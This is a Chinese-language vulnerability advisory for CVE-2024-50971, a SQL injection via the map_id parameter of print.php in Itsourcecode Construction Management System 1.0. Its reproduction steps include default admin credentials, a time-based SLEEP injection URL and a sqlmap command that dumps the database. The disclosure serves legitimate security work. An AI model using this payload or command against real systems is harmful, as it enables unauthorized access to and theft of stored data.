CVE-2024-50971
描述
Itsourcecode Construction Management System 1.0 的 print.php 中存在一个 SQL 注入漏洞,允许远程攻击者通过 map_id 参数执行任意 SQL 命令。
漏洞类型
SQL 注入
供应商
Itsourcecode
受影响产品代码库:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
受影响组件:
Itsourcecode Construction Management System v1.0 的 print.php 页面中,map_id 参数存在 SQL 注入漏洞。
攻击向量:
- 在本地搭建应用,注册一个账户,并使用管理员凭据 admin:admin 登录。
- 在浏览器中导航至以下 URL:
http://localhost/monitoring_system/print.php?map_id=67
- 注入 SQL 载荷:
修改 URL 中的 map_id 参数,包含一个基于时间的 SQL 注入载荷。
http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
- 观察应用响应:
如果注入成功,页面加载时间将明显延长(15 秒),确认 map_id 参数存在 SQL 注入漏洞。
- 现在使用 SQLMap 工具进行进一步利用,并使用以下命令导出数据库:
sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
参考:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection